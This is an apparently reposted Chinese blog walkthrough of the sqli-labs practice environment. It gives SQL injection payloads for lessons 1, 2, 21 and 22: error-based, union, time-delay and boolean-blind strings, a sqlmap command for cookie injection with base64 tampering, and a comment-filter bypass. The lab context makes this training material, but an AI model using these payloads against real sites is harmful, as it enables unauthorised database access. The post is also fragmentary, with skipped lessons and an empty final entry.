sqli-labs通关小结
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs通关小结相关的知识,希望对你有一定的参考价值。
附上工具:
phpstudy2016:链接:http://pan.baidu.com/s/1bpbEBCj 密码:fmr4
sqli-labs-master:链接:http://pan.baidu.com/s/1jH4WlMY 密码:11mj
环境搭建之前写过,这里就不多说了,直接开始通关体验
1、http://127.0.0.1/sqli-labs-master/Less-1/?id=1 单引号型
报错型注入payload:
1‘ and 1=extractvalue(1,concat(0x7e,(select database())))--+
Union联合查询型注入payload:
0‘ union select 1,database(),3--+
时间延迟型注入payload:
1%27%20and%20sleep(5)--+
布尔型盲注payload:
1‘ and 1=1 --+
1‘ and 1=2 --+
2、http://127.0.0.1/sqli-labs-master/Less-2/?id=1
0%20union%20select%201,database(),3%20--+
21、cookie型注入
抓包,修改请求包内容
将内容copy到C:\\Users\\qiupan\\Desktop\\26.txt中,sqlmap中执行命令:
python.exe sqlmap.py -r C:\\Users\\qiupan\\Desktop\\26.txt --cookie "uname=YWRtaW4%3D" --technique E --dbms mysql --tamper "base64encode.py" --batch
22、过滤了注释符
使用and ‘1‘=‘1来闭合引号即可
23、
以上是关于sqli-labs通关小结的主要内容,如果未能解决你的问题,请参考以下文章